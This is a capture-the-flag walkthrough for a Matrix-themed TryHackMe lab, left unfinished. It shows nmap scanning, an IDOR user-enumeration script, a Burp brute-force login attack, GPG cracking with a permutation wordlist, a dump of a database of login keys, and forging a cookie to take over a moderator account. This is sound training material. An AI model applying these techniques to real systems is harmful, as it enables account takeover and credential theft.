In this challenge, a short story is provided as the description, along with a machine and multiple questions. We need to solve the questions to complete the challenge.

**[email protected]:  
**

Most people only see a perfectly constructed system. But **you** have always been different. You see not only what is on the surface but also what governs beneath it; the internal correlating mechanisms that regulate and manage each of its modules almost so flawlessly that it attempts conceal all miniscule holes in its multifaceted design. However, these holes still exist, don't they?... Yes, you are still learning, but your greatest weakness is that self-doubt... It continues to hold you back... Do you know where it comes from? Deep down, I know you do. You know something is not right, you just cannot put your finger on it. Well let me tell you. You are living in a dream. One that has been placed over your eyes to blind you from you realising who you could become. Yes… I can sense you know what I am telling you is true... The dilemma is that there are these '**agents**'... Let us call them programs that look like you and me. They seek to spread that virus of **self-doubt**, **disbelief**, and **fear** into the subconsciousness of the few emerging hackers with great potential. Why you ask? It is because minds like yours are a threat to those in control of the 'M4tr1x system'; the artificial, simulated world developed to supress your full senses. We need you in this next war against the machines. But only you can escape from your engineered reality into the real world... I will be waiting on the other side.

**-------------------------------------------------------------------------------------------------------------------------------------------------------------------**

**[email protected]:**

Who are you?

Established the Connection

Step 1 : Connect to the TryHackMe Network using the command ,sudo openvpn <file.ovpn> .

Step 2 :Start the machine provided in the challenge to obtain the target IP address.

Information Gathering

Let’s perform Port Scanning on Target Machine to know the open port and services on target machine.

/cybersec/tryhackme ❯ nmap -sV -p- 10.49.184.94
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-04 17:45 +0545
Nmap scan report for 10.49.184.94
Host is up (0.053s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open  mysql   MariaDB 5.5.5-10.3.39
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.62 seconds

We can see that three ports are open, running the ssh, http, and mysql services on ports 22, 80, and 3306 respectively.

Exploitation

Let’s visit the port 80 on browser and check what we can see.

Step 1 : Register the new account on the system.

Verify the CAPTCHA to register successfully

In the /memberlist.php directory, we can see a list of members, and I found a user named whiterabbit.

Explore the posts and threads written by whiterabbit (aka willis), and you will find /bugbountyHQ.

You will get a form, but the input is disabled. So, I checked the page source using Ctrl + U and found a new directory: /reportPanel.php.

When we visit /reportPanel.php, it shows vulnerabilities reported by users. Among them is the latest vulnerability report by the user Edwards. According to him, anyone can perform a brute-force attack on the site because there is no time limit or CAPTCHA in the login mechanism. I also check the source code of the reportPanel.php, and i got something interesting stuffs but i don’t know about this.

<p hidden>
Keymaker message:
1 16 5 18 13 21 20 1 20 9 15 14 15 6 15 14 12 25 20 8 5 5 14 7 12 9 19 8 12 5 20 20 5 18 19 23 9 12 12 15 16 5 14 20 8 5 12 15 3 11 19
1 4 4 18 5 19 19: /0100101101100101011110010110110101100001011010110110010101110010
</p>

To exploit the vulnerability suggested by Edwards, we need a list of users and passwords. We can use the passwords provided by Edwards in the report.

Save the passwords in a pass.txt file.

password123
Password123
crabfish
linux123
secret
piggybank
windowsxp
starwars
qwerty123
qwerty
supermario
Luisfactor05
james123

One more interesting thing I found was an IDOR vulnerability on the site. We can enumerate users using the uid parameter:

http://10.49.184.94/member.php?action=profile&uid=3

I wrote a small script to enumerate all users by exploiting this IDOR vulnerability. Run the script; it will save the usernames in the userlist.txt file.

import requests
import re![[Pasted image 20260104182513.png]]

base_url = 'http://10.48.176.173/member.php?action=profile&uid='

with open('userlist.txt', 'w') as f:
    for uid in range(1, 1000):  # adjust range as needed
        url = base_url + str(uid)
        r = requests.get(url, timeout=2)

        match = re.search(r'<title>Linux-Bay - Profile of (.*?)</title>', r.text)
        if match:
            username = match.group(1).strip()
            print(f'[+] UID {uid}: {username}')
            f.write(username + '\n')

Now we have both the username list and the password list. Next, let’s perform a brute-force attack on:http://10.49.184.94/member.php?action=loginusing Burp Suite. Open the site in the Burp browser or any browser with the proxy configured, and capture the traffic.

Capture the traffic using the proxy and send it to Intruder.

Select the Cluster Bomb attack type, upload the username and password lists as payloads, and start the attack.

ℹ️ Reminder:
The Brute-force attack on Burp is going to take time, so please add the time on machine.

The attack is going to take a long time to obtain the credentials by brute-forcing the user, so I decided to work on the hidden code that we obtained earlier from /reportPanel.php. I noticed that:

1 4 4 18 5 19 19 => ADDRESS

This means it uses the A1Z26 cipher encoding, which is based on simple alphabetical order. Let’s decrypt the above text using CyberChef, and we get the final message:

apermutationofonlytheenglishletterswillopenthelocks

`` Since the long digit, 0100101101100101011110010110110101100001011010110110010101110010, is mentioned as an address, I visited it and got this:

When I checked the source code of the system, I got:

ℹ️ Info:
I am still confused about where we will need this information. Let’s continue with the brute-force task.

We can see a username and password combination with a different response length compared to normal traffic.

We can log in with those credentials. When we log in as ArnoldBagger, we get to know about the /devBuilds directory.

When I visited modManagerv2.plugin, I noticed a line suggesting a file that stores the SQL password.

We have a p.txt.gpg file, but it is encrypted. As per the previous message from keymakers,
a permutation of only the English letters will open the locks.

So, I copied the string mixed with Chinese and English characters from the source code and wrote a simple script that generates a wordlist using permutations of English letters and saves it in a perm.list file.

from itertools import permutations

# Your input string
text = "诶比西迪伊吉艾杰开哦o屁西迪伊吉杰开哦艾杰开f哦屁q西屁西迪伊吉艾杰开哦x屁西迪伊吉艾杰开哦屁西迪伊吉艾杰开v哦屁西迪伊吉艾杰西迪伊g吉艾杰提维"

# Step 1: Extract only English letters
english_chars = [c for c in text if c.isalpha() and c.isascii()]
print("English letters found:", ''.join(english_chars))

# Step 2: Open a file to save permutations
with open("perm.txt", "w") as file:
    # Use r=len(english_chars) for full-length permutations
    for p in permutations(english_chars):
        file.write(''.join(p) + '\n')

print("All permutations saved to perm.txt")

We have an encrypted file and a wordlist of passwords. Let’s try to decrypt the file using the popular tool, johntheripper.


…/tryhackme/matrix-acces ❯ gpg2john p.txt.gpg > hash

File p.txt.gpg

…/tryhackme/matrix-acces ❯ john --wordlist=perm.txt hash
Warning: detected hash type "gpg", but the string is also recognized as "gpg-opencl"
Use the "--format=gpg-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fvgoxq           (?)
1g 0:00:00:26 DONE (2026-01-05 18:36) 0.03720g/s 7.886p/s 7.886c/s 7.886C/s fvxgoq..fvgoxq
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The password is fvgoxq.

…/tryhackme/matrix-acces ❯ gpg -d p.txt.gpg
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
myS3CR3TPa55 //SQL Password

We now have the user mod and the SQL password.

I tried to connect to SQL using these credentials, but it asked for SSL.

…/tryhackme/matrix-acces ❯ mysql -h 10.48.171.182 -u mod -p
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

So, I used an alternative way to connect to the MySQL server using MariaDB and got access.


…/tryhackme/matrix-acces ✗ mariadb -h 10.48.171.182 -u mod -p --ssl=FALSE
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 115
Server version: 10.3.39-MariaDB-0ubuntu0.20.04.2 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

Check the existing databases on the server using the command show databases;.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| modManagerv2       |
| mybb               |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.086 sec)

Among the existing databases, modManagerv2 seems interesting, as we know the modManagerV2 plugin is vulnerable. Let’s use it and check the existing tables.

MariaDB [(none)]> use modManagerv2
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [modManagerv2]> show tables ;
+------------------------+
| Tables_in_modManagerv2 |
+------------------------+
| members                |
+------------------------+

We got the members table. Let’s read the data inside it.

MariaDB [modManagerv2]> select * from members;
+----------------+-----------------------------------------------------+
| user           | login_key                                           |
+----------------+-----------------------------------------------------+
| LucyRob        | xa72nhg3opUxviKUZWbMAwmyOekaJOFTGjiJjfAMhPkeIjk2Ig  |
| Wannabe_Hacker | LsVBnPTZGeUw6JkmMKFrzkSIUPu5TC0Nej8DAjwYXenQcCFEpv  |
| batmanZero     | TBTZq6GfniPvFfb2A3rA2mQoThcb5U7irVF5lLpr0L4cJcy5m9  |
| SandraJannit   | 6V5H71ZnvoW0FFbXx97YsV9LSnT4mltu9XB1v8qPo2X2CvfWBS  |
| biggieballo    | 75mXme5o0eY2o68sqeGBlTDvZcyJKmBhxUAusxiv6b816QilCG  |
| AimsGregger    | Xj8nuWt5Xn9UYzpIha1q2Fk4GUjyrEPPbpchDCwnniUO0ZzZyf  |
| BlackCat       | JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB  |
| Golderg        | clkNBtIoKICfzm6joGE2lTUiF2T8sVUfhtb2Aksst8zTRK2842  |
| TonyMontana    | 8CtllQvd9V2qqHv0ZSjUj3PzuTSD37pam4ld8YjlB7gDN0zVwE  |
| CaseBrax       | eHXBFESqEoE5Ba2gcOjD8oBMJcgNRkazcJOc8wQQ9mGVRpMdvU  |
| Ellie          | G9KY2siJp9OOymdCiQclQn9UhxL6rSpoA3MXHCDgvHCcrCOOuT  |
| Sosaxvector    | RURFzCfyEIBeTE3yzgQDY34zC9jWqiBwSnyzDooH33fSiYr9ci  |
| PalacerKing    | 49wrogyJpIQI834MlhDnDnbb3Zlm0tFehnpz8ftDroesKNGbAX  |
| Anderson       | lkJVgYjuKl9P4cg8WUb8XYlLsWKT4Zxl5sT9rgL2a2d5pgPU1w  |
| CrazyChris     | tpM9k17itNHwqqT7b1qpX8dMq5TK83knrDrYe6KmxgiztsS1QN  |
| StaceyLacer    | QD8HpoWWrvP1I7kC4fvTaEEunlUz2ABgFUG5Huj8nqeInlz7df  |
| ArnoldBagger   | OoTfmlJyJhdJiqHXucrvRueHvGhE6LnBi5ih27KLQBKfigQLud  |
| Carl_Dee       | 3mPkPyBRwo67MOrJCOW8JDorQ8FvLpuCnreGowYrMYymVvDDXr  |
| Xavier         | ZBs4Co6qovOGI7H9FOI1qPhURDOagvBUgdXo8gphst8DhIyukP  |
+----------------+-----------------------------------------------------+
19 rows in set (0.055 sec)

Still, we didn’t know the answers to the other questions.
I noticed something when I checked the user cookies—they are made up of uid + login_key.

We have the login_key of every user, and we can easily find the uid of any user. This means we can log in as anyone using cookies. Let’s find the most powerful user to log in as.

Among them, I found bigpaul as an administrator of the linux-bay system, but we don’t have his login_key. So, I selected BlackCat, who is the SuperModerator of the system.

The uid of BlackCat is 7, and the login_key is:

JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB

So, the final cookie will be:

7_JY1Avl8cqCMkIFprMxWbTxwf8dSkiv7GJHzlPDWJWWg9gnG3FB

Let’s replace the cookies of the existing user with BlackCat’s cookies, refresh the browser, and get logged in as BlackCat.

Successfully logged in as BlackCat.

We can see different files in BlackCat’s profile.

to be continueed ...